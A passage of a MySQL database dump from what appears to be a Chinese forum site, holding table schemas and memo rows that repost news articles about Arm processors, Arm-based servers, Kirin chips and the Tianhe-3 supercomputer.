07:46:15',0,-1,0,1,0,0),(749,215,520,'2021-03-10 12:44:46',0,-1,0,1,0,0),(750,216,477,'2021-03-10 15:00:34',0,-1,0,1,0,1),(751,210,521,'2021-03-11 01:23:26',0,-1,0,1,0,0),(752,181,522,'2021-03-11 03:49:28',0,-1,0,1,0,0),(754,216,523,'2021-03-11 06:49:44',0,-1,0,1,0,0),(755,218,477,'2021-03-11 07:11:50',0,-1,0,1,0,1),(756,218,524,'2021-03-11 07:12:57',0,-1,0,1,0,0),(758,217,477,'2021-03-11 15:00:14',0,-1,0,1,0,1),(759,194,525,'2021-03-15 02:11:41',0,-1,0,1,0,0);
|
||
/*!40000 ALTER TABLE `members` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `memo_forums`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `memo_forums`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `memo_forums` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`memo_id` int(11) DEFAULT NULL,
|
||
`forum_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_children` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_memo_forums_on_memo_id_and_forum_id` (`memo_id`,`forum_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=283 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `memo_forums`
|
||
--
|
||
|
||
LOCK TABLES `memo_forums` WRITE;
|
||
/*!40000 ALTER TABLE `memo_forums` DISABLE KEYS */;
|
||
INSERT INTO `memo_forums` VALUES (143,143,2,'2018-08-24 17:41:45','2018-08-24 17:41:45',0),(218,168,2,'2018-12-26 15:45:47','2018-12-26 15:45:47',0),(235,176,8,'2019-01-21 14:20:03','2019-01-21 14:20:03',0),(236,177,8,'2019-01-21 14:29:17','2019-01-21 14:29:17',0),(240,180,10,'2019-01-21 16:46:09','2019-01-21 16:46:09',0),(243,183,13,'2019-01-21 17:45:45','2019-01-21 17:45:45',0),(263,230,10,'2019-08-15 15:05:55','2019-08-15 15:05:55',0),(266,232,12,'2019-08-15 15:25:33','2019-08-15 15:25:33',0),(267,233,13,'2019-08-15 15:33:19','2019-08-15 15:33:19',0),(269,234,10,'2019-08-15 15:44:43','2019-08-15 15:44:43',0),(271,236,10,'2019-08-15 15:51:47','2019-08-15 15:51:47',0),(277,241,13,'2019-08-15 16:28:45','2019-08-15 16:28:45',0),(278,235,10,'2019-08-16 08:34:16','2019-08-16 08:34:16',0),(280,239,12,'2019-08-16 08:39:18','2019-08-16 08:39:18',0),(282,240,12,'2019-08-16 10:07:35','2019-08-16 10:07:35',0);
|
||
/*!40000 ALTER TABLE `memo_forums` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `memo_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `memo_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `memo_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`forum_id` int(11) DEFAULT NULL,
|
||
`memo_id` int(11) DEFAULT NULL,
|
||
`memo_type` varchar(255) DEFAULT NULL,
|
||
`viewed` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_memo_messages_on_user_id_and_forum_id_and_created_at` (`user_id`,`forum_id`,`created_at`),
|
||
KEY `index_memo_messages_on_memo_id_and_memo_type` (`memo_id`,`memo_type`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `memo_messages`
|
||
--
|
||
|
||
LOCK TABLES `memo_messages` WRITE;
|
||
/*!40000 ALTER TABLE `memo_messages` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `memo_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `memos`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `memos`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `memos` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`subject` varchar(255) NOT NULL,
|
||
`content` longtext NOT NULL,
|
||
`author_id` int(11) NOT NULL,
|
||
`replies_count` int(11) DEFAULT '0',
|
||
`last_reply_id` int(11) DEFAULT NULL,
|
||
`lock` tinyint(1) DEFAULT '0',
|
||
`sticky` tinyint(1) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`viewed_count` int(11) DEFAULT '0',
|
||
`root_id` int(11) DEFAULT NULL,
|
||
`reward` int(11) DEFAULT NULL,
|
||
`language` varchar(255) DEFAULT NULL,
|
||
`hidden` tinyint(1) DEFAULT '1',
|
||
`repertoire_name` varchar(255) DEFAULT NULL,
|
||
`is_md` tinyint(1) DEFAULT '1',
|
||
`published_at` datetime DEFAULT NULL,
|
||
`homepage_show` tinyint(1) DEFAULT '0',
|
||
`praises_count` int(11) DEFAULT '0',
|
||
`is_fine` tinyint(1) DEFAULT '0',
|
||
`last_reply_on` datetime DEFAULT NULL,
|
||
`tag_id` int(11) DEFAULT '1',
|
||
`is_original` tinyint(1) DEFAULT NULL,
|
||
`reprint_link` varchar(255) DEFAULT NULL,
|
||
`forum_section_id` int(11) DEFAULT NULL,
|
||
`destroy_status` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_memos_on_root_id` (`root_id`),
|
||
KEY `index_memos_on_destroy_status` (`destroy_status`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=371 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `memos`
|
||
--
|
||
|
||
LOCK TABLES `memos` WRITE;
|
||
/*!40000 ALTER TABLE `memos` DISABLE KEYS */;
|
||
INSERT INTO `memos` VALUES (2,NULL,'加速人工智能发展,Arm最近做了这三件事……','<a href =\"http://www.shanghai.gov.cn/nw2/nw2314/nw2315/nw31406/u21aw1259607.html\">上海市经信委</a> 绿色计算产业联盟 2017-10-11\n\n人工智能是未来科技的发展方向,将会对许多行业产生深远的影响,并将渗透到社会生活的方方面面。今天向大家介绍的Arm是一家总部位于英国剑桥的半导体IP设计公司,上海是中国总部所在地。作为计算和互联革命的核心,Arm技术正改变着人们生活和企业运行的方式。从不可或缺的领域到无形支持,Arm先进的高能效处理器设计已应用于超过1,000亿芯片,安全地为电子设备提供支持,覆盖从传感器到智能手机乃至超级计算的多种应用。Arm拥有超过1,100家技术合作伙伴,包括世界上最著名的商业和消费品牌。\n\n作为计算机科学的一个分支,人工智能从诞生以来,理论和技术日益成熟,人们已经开始在各个领域中研究和开发人工智能技术。考虑到Arm技术已被全球70%的人口所使用,实现安全的、无处不在的人工智能已经成为Arm的基础指导性设计原则。在推动人工智能发展的进程中,Arm最近又有哪些动作呢?\n\n一、新技术助力硬实力提升,从端到云加速人工智能体验\n\n物联网时代,万物互联对于物与物之间连接的要求提升,对AI提出了新的要求。从云端到设备端去布局计算,在设备端部署决策,依靠本地的计算实现智能,物联网“边缘”的机会越来越大,就需要处理器更低的功耗更强的性能,加强云端计算能力和设备端运算能力。\n\n今年3月推出的ArmDynamIQ技术是从芯片到云端部署智能的首个里程碑,作为未来ArmCortex-A系列处理器的基础,DynamIQ技术代表了多核处理设计行业的转折点,它带来了一种可以改变异构处理格局的新型技术架构:将大小两个集群合并,从而形成一个兼具大小CPU,完全集成化的CPU集群,其灵活多样性将重新定义更多类别设备的多核体验,覆盖从端到云的安全、通用平台。\n\n而不久前Arm推出的首批基于DynamIQ技术的ArmCortex-A75和Cortex-A55处理器针对人工智能性能任务并基于DynamIQ技术的专用指令,可助力Arm在未来3-5年实现人工智能运算性能50倍的提升。\n\nCortex-A75处理器是Arm最新发布的高性能CPU,同时也是基于全新DynamIQ技术的首款高性能CPU,其单线程的处理效能比前一代核心大幅提升50%,还搭载更好的多核处理功能。\n\nCortex-A55采用最新的Armv8.2架构,并在其前代产品的基础上打造而成。它在性能方面突破了极限,同时依旧保持了与Cortex-A53相同的功耗水平。\n\n二、Arm计算库公开发布,推动计算机视觉和机器学习的发展\n\n计算机视觉相当于是人工智能的大门,如果这个门不打开,就没有办法真的研究真实世界的人工智能。因为视觉信息与听觉触觉相比要重要得多,如果没有视觉信息的话,整个人工智能只是一个空架子,只能做符号推理。而机器学习更像是一个方法和工具,是计算机领域的人将统计的理论与方法应用到视觉、语音等领域,形成了机器学习这个模型。两者都是人工智能的重要组成部分,是让机器通过包括两者在内的众多技术的创新融合,实现像人一样去“看懂”、思考和处理事物的终极目标。\n\n机器学习以及计算机视觉等新兴技术为跨整个Arm体系以及所有细分市场的创新和业务增长带来了大好机遇,而Arm一直致力于为我们的合作伙伴和开发人员体系提供支持,除了新的CPU核心之外,Arm于3月底也发表了全新的ArmComputeLibrary。这款免费开源的计算库汇集了一系列针对ArmCortex-ANEON和MaliGPUIP而优化的入门级软件函数库,不管是现有或即将推出的ArmSoC,都可以从这个函式库获得明显的人工智能算法效能提升。采用这个函式库,机器学习与人工智能算法的效能将可提升10~15倍之多。\n\n而在7月初,Arm计算库第二个公开版本也正式发布,它增加了许多新功能,以加速基于ArmCortex-ACPU和ArmMaliGPU的计算机视觉和机器学习,推动人工智能技术的发展。\n\n三、生态为王,独乐乐不如众乐乐\n\n如果说计算能力的提升可以推动技术的发展,那么生态系统的完善则会加速产业化进程。万物互联的时代,将来数以万亿计的前端智能设备和无所不在的智能应用,使得人工智能场景变得碎片化;但同时,所有的应用在终端和云端又需要实现智能互通。这就要求整个产业在通用平台之上构建一个较以往更开放、更灵活的协作模式和生态系统,加之人工智能对安全性将会有苛刻的要求,以Arm技术为核心的生态系统对于解决这些问题有着天然的优势。\n\n6月下旬,Arm与多家生态系统合作伙伴发起Arm人工智能生态联盟(ArmAIEcosystemConsortium,简称AIEC),旨在联合产业链上下游合作伙伴,围绕以具体应用场景部署为目标,建立以数据、算法、芯片为支撑的互动创新生态体系,拉通云端和终端,加速人工智能产业化。\n\n图文:来自网络',1,2,NULL,0,0,'2018-07-06 11:00:07','2020-09-18 09:29:49',147,NULL,NULL,'',0,'',1,'2018-07-06 11:00:07',0,1,1,'2020-09-18 09:29:49',1,1,NULL,14,0),(4,NULL,'BaySand(倍赛达)让客户通过 Arm DesignStart计划使基于Arm定制ASIC更加易','电子产品世界 绿色计算产业联盟 2017-10-11\n\n作为可配置标准单元ASIC解决方案佼佼者,BaySand, Inc.(倍赛达)宣布:公司现在可提供采用Arm® Cortex®-M0和Cortex-M3处理器定制系统级芯片(SoC)的设计服务,并可通过Arm DesignStart™计划而无需预先支付处理器授权费用。\n原始设备制造商(Original Equipment \nManufacturers)正越来越多地采用定制的系统级芯片(SoC,System-on-Chip),以创造更加小巧、更低成本、更低功耗和更具差异化的产品。BaySand(倍赛达)提供基于DesignStart计划所包含处理器之设计服务,把进入门槛极大地降低,并使这些厂商能够从采用业界标准处理器以定制SoC中获益,而他们自身则无需具备芯片工程专业知识。\n\n作为全球超过200亿颗芯片中的主要处理器,Cortex-M0和Cortex-M3是各类定制SoC项目中验证度和可信度最高的处理器,对于物联网应用尤其如此。\n\nBaysand(倍赛达)首席执行官Salah Werfelli表示:“当Arm Cortex-M处理器与BaySand的技术及专业设计服务结合在一起时,可在诸如物联网、可穿戴电子和家用电器等竞争激烈的细分市场中提供可快速上市、低成本的ASIC解决方案,令我们的客户可以轻松地利用定制化ASIC方案来实现产品差异化。”\n\nArm嵌入式与汽车业务副总裁兼总经理John Ronco亦表示:“通过快速的网上获取和取消预付授权费用,DesignStart为新的SoC设计开闸放流;而通过与BaySand(倍赛达)的定制化ASIC专长结合在一起,更多的公司能够方便快捷地获得世界上部署最广泛的嵌入式处理器知识产权(IP),以及工具、软件和SoC IP等生态系统支持。”\n\nBaySand(倍赛达)设计中心提供经验丰富、能力全面的工程团队,其专业知识涉及无线、视频和物联网硬件及相应的算法。BaySand(倍赛达)提供一整套ASIC设计服务、IP核及ASIC解决方案,可以帮助客户以各种Arm 处理器定制其SoC。\n\n目前越来越多的中国OEM及系统设计公司(IDH)正在寻求利用定制SoC来增强其物联网系统设计,应用于下一代数字消费性产品、智能家居、智慧城市、智能汽车等。BaySand(倍赛达)在四川省泸州市已建立了一家全功能的机构(泸州倍赛达科技有限公司),其中的工程与专业服务团队将为全球客户提供领先的定制SoC解决方案。\n\n\n\n图文:来自网络\n<a href = \"http://www.eepw.com.cn/article/201710/369812.htm\">阅读原文</a>',1,0,NULL,0,0,'2018-07-06 11:03:07','2021-01-29 09:50:03',129,NULL,NULL,'--- []\n',0,'',1,'2018-07-06 11:03:07',0,2,0,'2020-08-25 13:56:00',1,1,NULL,21,0),(21,NULL,'中标软件亮相中国电子展','原创: 爱你们的 <a href =\"https://mp.weixin.qq.com/s/YOk9a3_yphHKtD7w5H_92A\">中标软件</a> 4月11日\n\n018年4月9日-11日,由工信部与深圳市共同主办的第六届中国电子信息博览会在深圳盛大举行。会上不仅展示了机器人、智慧城市、智慧教育、智能汽车、智慧医疗等创新技术成果,还重点展示并解读了中国电子信息技术发展最新成果和发展趋势。不难看出,博览会的影响力在不断增强,已成为外界了解中国电子信息产业的窗口和引领产业发展的风向标。中标软件与创新科、华芯通等产业链合作伙伴联合亮相,展示国产自主软硬一体产品。\n\n\n\n同时,中标软件还受邀参加了同期举办的“绿色计算标准与产业峰会”,与工信部相关领导,GCC理事会及全体成员,微软、红帽等组织及企业知名专家共同探讨了绿色计算产业发展、开源生态建设,操作系统对ARM64支持,异构计算开放标准、内存接口开放标准、带外管理国际标准等内容。中标软件副总经理徐宁博士在《基于开放ARM可信操作系统关键技术》中介绍了中标麒麟在ARM平台的工作情况及可信操作系统关键技术。\n\n\n\n近年来,中标软件顺应产业发展趋势,一方面融入全球主流产业链和生态链,另一方面加快构建中标麒麟自主可控生态体系,为实现新一代信息技术条件下的“替代升级”做好了准备。中标软件将根据产业发展需求,进一步对接ARM生态体系,围绕绿色计算系统标准研制等领域,深入参与绿色计算产业联盟工作,贡献积极力量,以推动绿色计算开放标准,引领国际产业发展,共建生态繁荣。\n目前,国产操作系统和国产芯片正在共同培育完善的自主软硬件体系,并同步构建了生态产业链,并且在政务、金融、电力、教育、财税、公安、审计、交通、医疗、制造等多个行业取得深入应用,且应用地域覆盖全国,并正在向工业互联网在内的更广泛IT设备上移植。',1,0,NULL,0,0,'2018-07-06 11:31:49','2021-01-28 18:59:47',124,NULL,NULL,'',0,'',1,'2018-07-06 11:31:49',0,3,0,'2020-09-07 16:37:42',1,1,NULL,NULL,0),(22,NULL,'UIT创新科DCServer ,全国首发10nm Arm服务器','UIT创新科 绿色计算产业联盟 4月13日\n\n2018年4月9日,第六届中国电子信息博览会(简称:2018CITE)在深圳会展中心隆重召开。中国电子信息博览会是工业和信息化部与深圳市人民政府联手打造的国家级电子信息全产业链展示平台,集中体现了电子信息领域的最新发展成就。UIT创新科在2018CITE上,展示了首款10nmArm服务器DCServer H2000及其生态建设和软件定义存储等最新创新成果。\n\n2018年4月10日,在2018CITE期间, UIT创新科联手高通和华芯通半导体,发布首款基于10nm Arm处理器的数据中心服务器DCServer H2000。UIT创新科董事长陈凯、UIT创新科副总裁兼服务器产品线总经理罗艳、高通公司中国区主要负责人,华芯通董事长、CEO及销售副总裁曾明和数十位Arm服务器生态合作伙伴、用户代表共同出席了此次发布会。\n\n\n\n在云计算、大数据、互联网、物联网、人工智能等新兴技术的推动下,数据中心市场取得高速发展,中国数据中心规模也不断扩大。数据中心在飞速发展的同时,也面临着诸多挑战。传统数据中心IT基础架构复杂,效率低下;能耗巨大,能源浪费严重; “棱镜门”事件后,国内外信息泄露事件频发,信息安全存在重大隐患。新一代数据中心的建设,迫切地需要寻求一种集高性能、低功耗、生态健全开放、安全可靠于一体的新平台,UIT创新科推出的DCServer H2000数据中心服务器,正好满足了上述需求,可以帮助客户轻松解决数据中心面临的诸多问题。\n \nDCServer H2000采用全球首款也是唯一的10nm Arm架构服务器处理器,最高48物理核心,支持NVMe SSD加速,特别针对云计算、大数据、人工智能、政务云等计算密集型工作负载设计和优化,旨在帮助客户更快地部署数据中心硬件平台,以满足新一代数据中心的需求。DCServer H2000的创新和先进性在于:处理器是采用高通Centriq 2400系列处理器,在仅为398平方毫米的面积上集成了180亿个晶体管。它包含最高可达48颗的高性能64位单线程内核,主频最高可达2.6GHz。各个内核由总带宽为250Gbps的双向分段闭合环形总线连接,可避免满负荷情况下性能瓶颈。为了在不同应用场景中达到性能最优,该设计中每两个内核共享512 KB二级缓存(L2 Cache),并有60 MB统一的三级缓存(L3 Cache)分布在硅片上。它有6个DDR4内存通道,32条PCIe Gen3 通道和6个 PCIe控制器,DRAM内存最高可达768GB。DCServer H2000使用的处理器能够在功耗低于120瓦的同时实现卓越的性能,其平均功耗仅65瓦。DCServer H2000支持NVMe SSD加速,可为客户提供超强的计算性能与I/O加速。可选配内置加密模块的处理器,支持国密核心算法(SM2,3,4)和通用国际算法。如此一来,不论是云计算、大数据、人工智能应用,还是政务云、互联网数据中心,都可以采用DCServer H2000作为硬件平台,从而为客户带来高效、绿色、生态健全、安全可靠的极致体验。\n \n云计算:DCServer H2000具备完善的开源生态环境,全面支持Redhat、Ubuntu、CentOS、KVM、Kubernetes、OpenStack、Cloud Foundry等各类主流的操作系统、虚拟化、容器及云平台。处理器提供在线内存带宽压缩技术,可有效的增加内存带宽并减少内存空间占用,并具有非常低的解压缩延迟,对公有云环境中常见的(可压缩)带宽密集型工作负载具有显著效果。\n \n大数据:DCServer H2000支持Hadoop、Apache Spark、MongoDB、My SQL等各类大数据平台软件,具备完善的生态环境。支持NVMe SSD,针对高并发工作负载进行了设计,可全面优化大数据环境下的工作负载。\n \n互联网数据中心:互联网数据中心规模庞大,吞吐密集,能耗巨大。DCServer H2000所使用的处理器最大48核心,擅长应对高度并行的工作负载,其平均功耗仅65瓦,可提供非常领先的性瓦比和总体拥有成本。\n \n人工智能:DCServer H2000的处理器,能够与来自Xilinx的FPGA合作服务于一些已经较为成熟的人工智能应用,比如说在图片分类识别、语音识别、个性化内容推荐算法等领域的深度学习、采用WEBP图片压缩格式的图片压缩处理、使用DNN算法用于广告搜索的DNN计算加速等领域。\n \n政务云:DCServer H2000可支持中标麒麟、EasyStack、ZStack、东方通、达梦数据库、致远政务软件等各类国产操作系统、云平台、中间件、数据库、政务办公软件。DCServer H2000处理器内嵌加密模块,支持国密核心算法(SM2,3,4)和通用国际算法,可完全满足党政军等客户对信息安全性的严苛要求,可帮助客户构筑安全可靠的政务云系统。\n \nUIT创新科副总裁罗艳表示,“当前,我国数据中心正处于一个高速建设的时期,已经逐步渗入到互联网、金融、电信、政务、医疗、教育、企业等各行各业,未来的发展会更加迅猛。数据中心的快速发展对硬件平台的计算效率、功耗、安全性等要求都在不断提高,我们希望通过推出DCServer H2000数据中心服务器,打破当前数据中心所面临的困境,帮助客户打造高性能、低功耗、生态健全开放、安全可靠的新一代数据中心。”\n\n\n\nUIT创新科 罗艳副总裁表示DCServer H2000将帮助用户打造全新的绿色数据中心\n\n高通公司相关负责人表示,高通Centriq 2400系列处理器系全球首款10纳米服务器晶片,将高效能,低功耗的Arm架构从概念化为真实。并开始在全球范围内将Centriq服务器处理器家族带到数据中心领域中。同时,高通公司也非常重视中国市场,希望在中国区建设更强健的Arm生态系统,让客户在高端服务器处理器上拥有全新的选择。\n\n华芯通半导体首席执行官汪凯博士表示,非常高兴看到国内首款10nm Arm架构数据中心服务器的发布,10nm Arm处理器将对数据中心领域产生革命性影响。华芯通半导体计划于今年下半年推出第一代完整的、经过验证的、安全可控的华芯通10nm Arm架构处理器,该服务器芯片具备出色的计算性能,较低功耗,以及由华芯通团队开发的安全可控基础架构。华芯通将进一步拓展安全可控的本土云生态产业链,构建更健全的Arm生态系统,在现有开源和主流软件基础上为用户提供更多选择,并努力使Arm生态系统平台成为传统基础设施的生力军。\n\n\n\n华芯通半导体首席执行官汪凯博士表示华芯通半导体将努力推动Arm生态系统平台更广泛的应用 \n\n业界普遍认为,DCServer H2000数据中心服务器优势突出。Arm处理器更适合数据中心业务,能大幅提升计算效率,更符合数据中心高性能、低能耗、安全可靠的发展的需求。国内外互联网巨头均已开始采用Arm处理器架构的服务器设备,用于解决计算、能耗和安全性问题。 DCServer H2000数据中心Arm服务器将帮助用户打造全新的绿色数据中心。\n\n图文:来自网络',1,0,NULL,0,0,'2018-07-06 11:33:05','2018-07-19 09:30:53',72,NULL,NULL,'',0,'',1,'2018-07-06 11:33:05',0,0,0,NULL,1,1,NULL,NULL,0),(97,NULL,'华为吐露了麒麟980的发布时间, 网友: 华为最强旗舰SOC!','\n\n今年,华为和Honor已经发布了多款智能手机。 它们包括从旗舰P20系列到低端Honor Play的各种型号,以及昨天的华为Nova 3.它们都有一个共同点:都装有相同的麒麟970芯片。\n\n最初,麒麟900系列应该是旗舰级soc。但麒麟970出现在许多中低端机型上,所以我们感觉是出了什么问题。另一方面,去年推出的麒麟970已经不能满足市场需要了。因此,现在正是发布下一代旗舰处理器的最佳时机。这就是为什么关于即将到来的麒麟980不断被爆料的原因。\n\n\n\n昨日,华为技术公司智能手机部门负责人何刚透露,华为麒麟980预计将在今年9月的IFA会议上发布。但他没有提供任何有关即将推出的旗舰芯片的信息。此前有报道称麒麟980已被移交给台积电代工。\n\n众所周知,在过去,麒麟SoC在GPU性能上与高通骁龙同级的SoC有很大的差距。而GPU Turbo技术的引入使其具有竞争力并填补了这一空白。我们知道麒麟SoC与高通骁龙845的GPU相比,在细节上还有一定的差距。但我们不能忽视这样一个事实,华为做了大量工作,并带来了更好的图形体验。\n\n此外,在麒麟970上,由于NPU核心的集成,其AI性能得到了极大的提升,预计华为将继续在AI领域进行更深入的研究。因此,预计麒麟980在GPU和NPU性能上会有更多亮点。',1,0,NULL,0,0,'2018-07-20 11:15:57','2019-08-05 15:53:33',24,NULL,NULL,'',0,NULL,1,'2018-08-04 15:23:33',0,1,0,NULL,1,1,NULL,NULL,0),(123,NULL,'“天河三号”E级原型机完成部署,争夺超算皇冠自主可控再获突破','日前,由国防科技大学和国家超级计算天津中心等团队合作研制的“天河三号”E级原型机已在国家超级计算天津中心完成研制部署,并于7月22日顺利通过项目课题验收。\n\n在原型样机系统基础上,“天河三号”超级计算机有望于2020年研制成功,其运算能力将比“天河一号”提高200倍,存储容量提高100倍。\n\n\n\n“超级计算机已成为一个国家信息技术创新的核心驱动,国家综合国力提升的强大支撑,以及快速发展高端信息技术的牛鼻子。”国家超级计算天津中心主任刘光明表示。\n\n争夺“超算界的下一顶皇冠”\n\n新一代百亿亿次超级计算机的研制计划是国际高端信息技术创新和竞争的前沿。百亿亿次超级计算机也称“E级超算”,被公认为“超算界的下一顶皇冠”。美国和日本均已提出E级超级计算机的研制计划,拟在2020年或之后完成研制。我国的百亿亿次超级计算机的研制计划也早已提上日程。\n\n2015年,“天河二号”在系统升级方面遇到了麻烦:美国商务部针对中国,实行了英特尔“至强”(XEON)芯片的禁运政策。美国方面给出的解释是中国超算中心从事“违反”美国国家安全或外交政策利益的活动。\n\n而这件事,也促成了国产芯片的发展。中国很快研发出了自主众核加速器。\n\n2016年,科技部结合“十三五”发展规划,分两期启动我国E级计算机研制计划。第一期主要为E级计算机关键技术研究,安排了三个E级机原型样机的研制;第二期为研制E级计算机。\n\n其中,“天河三号”E级原型机经过两年多的关键技术攻关和突破,成为我国首个完成原型样机系统研制和部署的项目。\n\n自主突破\n\n“天河”系列超级计算机已经全面掌握五大自主核心技术,即具有自主知识产权的四大芯片和自主操作系统,所有核心技术和产品均不再被国外“卡脖子”。\n\n目前,通用CPU和加速器CPU、互连通信路由芯片和互连接口芯片,均已装配在“天河二号”2期系统中,打破了2015年美国对国防科大和“天河”系超算中心的CPU禁运,而“天河三号”超级计算机将对这四大芯片进行全面升级。\n\n“天河三号”E级原型机实现了四大自主创新,即三款芯片——“迈创”众核处理器(Matrix-2000+)、互连接口芯片、路由器芯片;四类计算、存储和服务结点,10余种PCB电路板;新型的计算处理、高速互连、并行存储、服务处理、监控诊断、基础架构等硬件分系统;系统操作、并行开发、应用支撑和综合管理等软件分系统。\n\n未来“天河三号”E级超级计算机将对已经设计生产的三款计算、互联通信核心芯片再进行全面升级,同时基于飞腾CPU设计新的多核CPU,实现可支持海量数据存储的层次式存储系统,对适用高性能计算和高效大数据处理的柔性体系结构进一步优化。计划利用2—3年的时间打造出全自主的具有国际领先水平的新一代“天河三号”E级超级计算机。\n\n应用前景广阔\n\n天津超算中心将依托“天河三号”构建超级计算与云计算和大数据深度融合的高性能计算服务平台,在长效高分辨率气候气象预报、大规模航空航天数值风洞、地震地质研究和油气能源勘探、脑科学与基因工程等生命科学研究等超大规模计算与模拟,以及涉及国计民生、信息安全的政务数据、医疗卫生、基因健康、地理、海洋等大数据分析处理领域发挥强大支撑和平台作用。\n\n“天河三号”超级计算机部署在滨海新区,也将进一步引领天津智能产业创新发展,推动现有传统支柱转型升级,同时以“京津冀大数据协同处理中心”等为载体,对接雄安新区,全面服务京津冀协同创新,成为京津冀区域创新发展的重要引擎。',1,0,NULL,0,0,'2018-08-09 16:55:45','2019-08-16 08:42:24',32,NULL,NULL,'',0,NULL,1,'2018-08-08 16:54:41',0,1,0,NULL,1,1,NULL,NULL,0),(143,NULL,'Arm披露最新进展:引领未来,让成功属于所有的人','\n**Arm公司基础设施部资深副总裁Drew Henry**\n\n1991年成立,前22年出产了500亿芯片,随后的四年又出产了500亿芯片,保守的预计,未来五年将再出产1000亿芯片。\n\n\n\n2016年,50%嵌入式芯片是基于Arm,现在70%的音视频应用采用了Arm芯片,预计到2035年将有1万亿芯片基于Arm。\n\n\n\n产量巨大,新的投资都在以Arm为核心\n\n由于产量巨大,芯片制造商最先进的制造工艺都是围绕Arm投资的。\n\n\n\nArm坚持的商业模式是与合作伙伴一起合作共赢。\n\nGSMA今年宣布,中国将主导IoT产业,Arm的责任是以技术创新支持万亿级市场需求。\n\n未来芯片寻址将基于网络\n\n服务器定义在变,芯片市场也在巨变。CPU之外,GPU、TPU、NPU等正在迅速崛起,未来芯片寻址将基于网络,软件可以在其间自由运行,Arm是最适合这种趋势的技术架构。一个令人激动的例子是Smart Offload获得了大规模部署。\n\n\n\n移动、IoT与云的发展变化,正在催生全新的下一代技术架构,5G、视频等加速了这一新趋势的到来。\n\n\n\n移动、IoT与云的发展变化,正在催生全新的下一代技术架构,5G、视频等加速了这一新趋势的到来。\n\n\n\nArm近期计划\n\nArm正在实现从端到云的支持,支持合作伙伴使用Arm或者自己的微架构。\n\n\n\n以“战神”命名的新一代Arm芯片,从2017年到2022年预计将有10倍性能的增长,台积电等在工艺上已经为此进行了大量投资。\n\nArm成功的秘密\n\nArm能够引领未来的秘密,是因为设计理念完全关注于新的应用领域。\n\n生态是Arm最大的能量\n\nArm建立了一种最成功的商业模式,自己只提供架构,芯片厂商提供最好的工艺,合作伙伴在此基础上进行创新,服务各种类型的客户,让成功属于所有的人。\n',1,0,NULL,0,0,'2018-08-24 17:40:37','2020-08-10 18:19:55',59,NULL,NULL,'',0,NULL,1,'2018-08-23 17:34:09',0,1,0,'2020-08-10 18:19:55',1,1,NULL,2,0),(160,NULL,'HPC Systems公司开始提供基于Arm的HPC云服务','*(本文由日本HPC SYSTEM公司发布内容而翻译整理,如有歧义,以原文为准。后附原文网址和咨询电话。)*\n\n\n\n**<背景>**\n\n美国、欧洲、中国及日本,都在推进面向2021~2024年的百亿亿次级(Exascale)超级计算。从日本的超级计算机“Post-K”的设计指标来看,将在原来“K”能耗(12.7MW)的2.36~3.15倍的条件下,实现最大100倍的应用性能(1EFLOPS)。作为该超级计算机的核心CPU,Armv8处理器架构备受期待。\n \n同时,近年来除了科学技术计算外,在大数据分析、机器学习、深度学习以及AI等方面,搭载具有从数百到数千并发性的高密度处理器、一框超过2000W电量的高性能计算机也被大量使用。\n \n这些高性能计算机,其耗电量和散热将对地球温室效应产生不小的影响,作为缓解措施,采用在耗电性能方面具备优势的Armv8服务器处理器,同时提供相应的产品和服务,对于本公司来说是极为重要的责任和义务。\n \n**<服务内容>**\n \n在Arm、Marvell、HiSilicon的大力协助下,本公司在Armv8架构的处理器环境中,实现了包括高速相互连接InfiniBand的硬件验证和HPC应用程序的验证及构建。本公司充分发挥在科学计算系统集成技术及应用软件优化技术的深厚积累,通过Arm HPC云服务提供HPC应用。\n \n本公司在具有极高可靠性的IDC Frontier公司的数据中心中部署了Arm HPC云服务,目的是使客户能够率先、广泛地采用HPC环境。本公司计划在11月12~15日于美国德克萨斯州达拉斯举行的Supercomputer Conference上展示和发布 (SC18:https://sc18.supercomputing.org/)。\n \n今后,本公司还将继续优化科学计算的应用程序,并将发布在Science Cloud On Arm HPC上。\n \n**■ Marvell(R)ThunderX2(R) Arm处理器**\n \nMarvell(R) ThunderX2(R) 